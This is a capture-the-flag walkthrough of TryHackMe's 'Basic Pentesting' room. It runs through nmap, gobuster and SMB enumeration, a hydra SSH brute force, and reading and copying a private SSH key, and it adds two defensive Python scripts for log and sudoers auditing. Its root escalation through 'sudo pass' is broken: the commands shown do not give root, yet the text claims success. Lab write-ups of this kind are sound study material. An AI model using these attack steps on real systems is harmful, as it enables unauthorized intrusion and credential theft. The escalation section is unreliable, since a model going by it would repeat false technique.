TryHackMe: Basic Pentesting CTF Writeup


This writeup covers the Basic Pentesting room on TryHackMe, which is perfect for beginners learning penetration testing fundamentals. The room demonstrates common enumeration techniques, exploitation methods, and privilege escalation vectors.

CTF Methodology

Target Information

  • Room: Basic Pentesting
  • Platform: TryHackMe
  • Difficulty: Easy
  • Target IP: 10.10.X.X (replace with your assigned IP)

Enumeration

Initial Reconnaissance

Let’s start with an Nmap scan to identify open ports and services:

nmap -sC -sV -oN nmap_initial.txt 10.10.X.X

Results:

Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 10.10.X.X
Host is up (0.045s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7

Great! We have several interesting services:

  • SSH (port 22)
  • HTTP (port 80)
  • SMB (ports 139/445)
  • Tomcat (port 8080)
  • AJP (port 8009)

Web Enumeration

Port 80 Investigation:

Let’s check what’s running on the web server:

curl http://10.10.X.X

Let’s run a directory enumeration:

gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt

Results:

/development (Status: 301)

Visiting /development reveals two interesting files:

  • dev.txt - Contains a list of potential usernames
  • j.txt - Contains what appears to be a password

Port 8080 (Tomcat) Investigation:

curl http://10.10.X.X:8080

The default Tomcat page is accessible. Let’s try accessing the manager interface:

gobuster dir -u http://10.10.X.X:8080 -w /usr/share/wordlists/dirb/common.txt

SMB Enumeration

Let’s enumerate the SMB shares:

enum4linux 10.10.X.X
smbclient -L //10.10.X.X -N

Results:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Anonymous       Disk      
        IPC$            IPC       IPC Service

We can access the Anonymous share:

smbclient //10.10.X.X/Anonymous -N

Inside the share, we find a staff.txt file containing usernames and potential passwords.

Exploitation

SSH Brute Force

Based on our enumeration, we have:

  • Usernames from /development/dev.txt and SMB share
  • Potential passwords from /development/j.txt and SMB share

Let’s create wordlists and attempt SSH brute force:

hydra -L users.txt -P passwords.txt ssh://10.10.X.X

Success! We find a valid credential pair: jan:armando
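The hydra run above leaves a recognisable trace in the target's sshd log. As an added example (not part of the original writeup), this Python script parses constructed /var/log/auth.log lines and alerts when a successful login from a source IP follows a burst of failures from the same IP, the pattern a dictionary attack produces; the IPs, PIDs, timestamps, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines in /var/log/auth.log format; IPs, PIDs and
# timestamps are hypothetical. The burst from 10.10.14.5 is what a hydra run leaves.
SAMPLE_AUTH_LOG = """\
Mar  4 10:15:01 target sshd[1201]: Failed password for invalid user root from 10.10.14.5 port 40120 ssh2
Mar  4 10:15:01 target sshd[1203]: Failed password for jan from 10.10.14.5 port 40122 ssh2
Mar  4 10:15:02 target sshd[1205]: Failed password for jan from 10.10.14.5 port 40124 ssh2
Mar  4 10:15:02 target sshd[1207]: Failed password for kay from 10.10.14.5 port 40126 ssh2
Mar  4 10:15:03 target sshd[1209]: Failed password for jan from 10.10.14.5 port 40128 ssh2
Mar  4 10:15:03 target sshd[1211]: Accepted password for jan from 10.10.14.5 port 40130 ssh2
Mar  4 10:20:44 target sshd[1300]: Accepted publickey for kay from 10.10.14.9 port 51000 ssh2
Mar  4 10:21:10 target sshd[1302]: Failed password for kay from 10.10.14.9 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_events(log_text):
    """Yield (timestamp, result, method, user, ip) for each sshd auth line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # Syslog timestamps carry no year; only time deltas matter here.
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["result"], m["method"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Alert when a successful login from an IP follows >= threshold failures
    from that same IP within window_seconds (the dictionary-attack signature)."""
    failures = defaultdict(list)  # source IP -> timestamps of failed logins
    alerts = []
    for ts, result, method, user, ip in parse_events(log_text):
        if result == "Failed":
            failures[ip].append(ts)
            continue
        recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
        if len(recent) >= threshold:
            alerts.append({"ip": ip, "user": user, "method": method,
                           "failures_before_success": len(recent)})
    return alerts
```

Running detect_bruteforce(SAMPLE_AUTH_LOG) reports the single source that failed five times and then authenticated as jan; the key-based login from the other address raises nothing.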

Initial Access

SSH into the target:

ssh jan@10.10.X.X

We successfully get a shell as the user jan.

Privilege Escalation

System Enumeration

Once on the system, let’s gather information:

# Check current user and groups
whoami
id

# Check sudo permissions
sudo -l

# Find SUID binaries
find / -perm -4000 2>/dev/null

# Check for interesting files
ls -la /home/

Discovering Kay’s Credentials

Exploring the system, we find another user kay. Let’s look for ways to escalate:

# Check for hidden files in jan's home
ls -la /home/jan/

# Look for configuration files
find /home/jan -name ".*" 2>/dev/null

We discover .ssh/id_rsa - a private SSH key!

cat /home/jan/.ssh/id_rsa

Lateral Movement to Kay

The private key might belong to another user. Let’s try using it to access kay:

# Copy the private key to our local machine
scp jan@10.10.X.X:/home/jan/.ssh/id_rsa ./kay_key

# Set proper permissions
chmod 600 kay_key

# Try to SSH as kay
ssh -i kay_key kay@10.10.X.X

Success! We can now access the system as kay.

Root Privilege Escalation

Now as kay, let’s check for root escalation paths:

# Check sudo permissions
sudo -l

Result:

(root) NOPASSWD: /usr/bin/pass

Kay can run the pass command as root without a password. The pass utility is a password manager that can execute arbitrary commands.

Exploiting Pass

Let’s abuse the pass command to get root:

# Check pass help
sudo pass --help

# Use pass to execute a shell
sudo pass show test; /bin/bash

Alternatively, we can use the -c option:

sudo pass generate test 10 -c /bin/bash

Root shell achieved!
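The NOPASSWD rule that `sudo -l` revealed is exactly what a sudoers review should catch before an attacker does. The following Python audit is an added example, not from the original writeup: it parses a constructed /etc/sudoers excerpt (the kay rule copied from the `sudo -l` result above, every other line hypothetical) and flags passwordless root rules, wildcards in command specs and commands given by relative path.

```python
import re

# Constructed /etc/sudoers excerpt (hypothetical); the kay line mirrors the writeup's `sudo -l` output.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
kay      ALL=(root) NOPASSWD: /usr/bin/pass
jan      ALL=(root) /usr/sbin/service apache2 restart
backup   ALL=(ALL) NOPASSWD: ALL
www-data ALL=(root) NOPASSWD: /opt/scripts/*
"""

# user_or_%group  host=(runas[:group]) [TAG: ...] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

def parse_sudoers(text):
    """Parse user-specification lines; comments, Defaults and alias lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        m = RULE_RE.match(line) if line and not line.startswith(SKIP) else None
        if not m:
            continue
        runas = (m["runas"] or "root").split(":")[0]  # user part of (user:group)
        tags = {t for t in m["tags"].replace(" ", "").split(":") if t}
        cmds = [c.strip() for c in m["cmds"].split(",")]
        rules.append({"who": m["who"], "runas": runas, "tags": tags, "cmds": cmds})
    return rules

def audit_sudoers(text):
    """Return (who, cmd, issue) for passwordless-root rules, wildcards and relative paths."""
    findings = []
    for r in parse_sudoers(text):
        if r["who"] == "root":
            continue
        nopasswd_root = "NOPASSWD" in r["tags"] and r["runas"] in ("root", "ALL")
        for cmd in r["cmds"]:
            if nopasswd_root:
                findings.append((r["who"], cmd, "passwordless root execution"))
            if cmd != "ALL" and "*" in cmd:
                findings.append((r["who"], cmd, "wildcard in command spec"))
            elif cmd != "ALL" and not cmd.startswith("/"):
                findings.append((r["who"], cmd, "command is not an absolute path"))
    return findings
```

On the sample, audit_sudoers flags kay's pass rule, the unrestricted backup rule and both problems with the www-data wildcard, while jan's password-protected service restart passes.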

Finding the Flags

User Flag

cat /home/kay/user.txt

Root Flag

cat /root/root.txt

Summary

This CTF demonstrated several key penetration testing concepts:

  1. Comprehensive Enumeration: We scanned multiple services (HTTP, SMB, SSH)
  2. Information Gathering: Found credentials through web directory enumeration and SMB shares
  3. Credential Reuse: Used discovered credentials for SSH access
  4. Lateral Movement: Found SSH private keys to move between users
  5. Privilege Escalation: Exploited sudo permissions on the pass utility

Key Takeaways

  • Always enumerate thoroughly: Each service can provide valuable information
  • Look for credential reuse: Passwords found in one location often work elsewhere
  • Check user directories: Private keys and configuration files are goldmines
  • Understand sudo permissions: Misconfigured sudo rules are common escalation vectors
  • Research unfamiliar binaries: Tools like pass might have unexpected capabilities

Remediation

  • Remove sensitive information from web directories
  • Secure SMB shares (require authentication)
  • Implement strong password policies
  • Secure SSH keys with proper permissions
  • Review and restrict sudo permissions
  • Conduct regular security audits and penetration tests

Disclaimer: This writeup is for educational purposes only. Always ensure you have proper authorization before testing any system.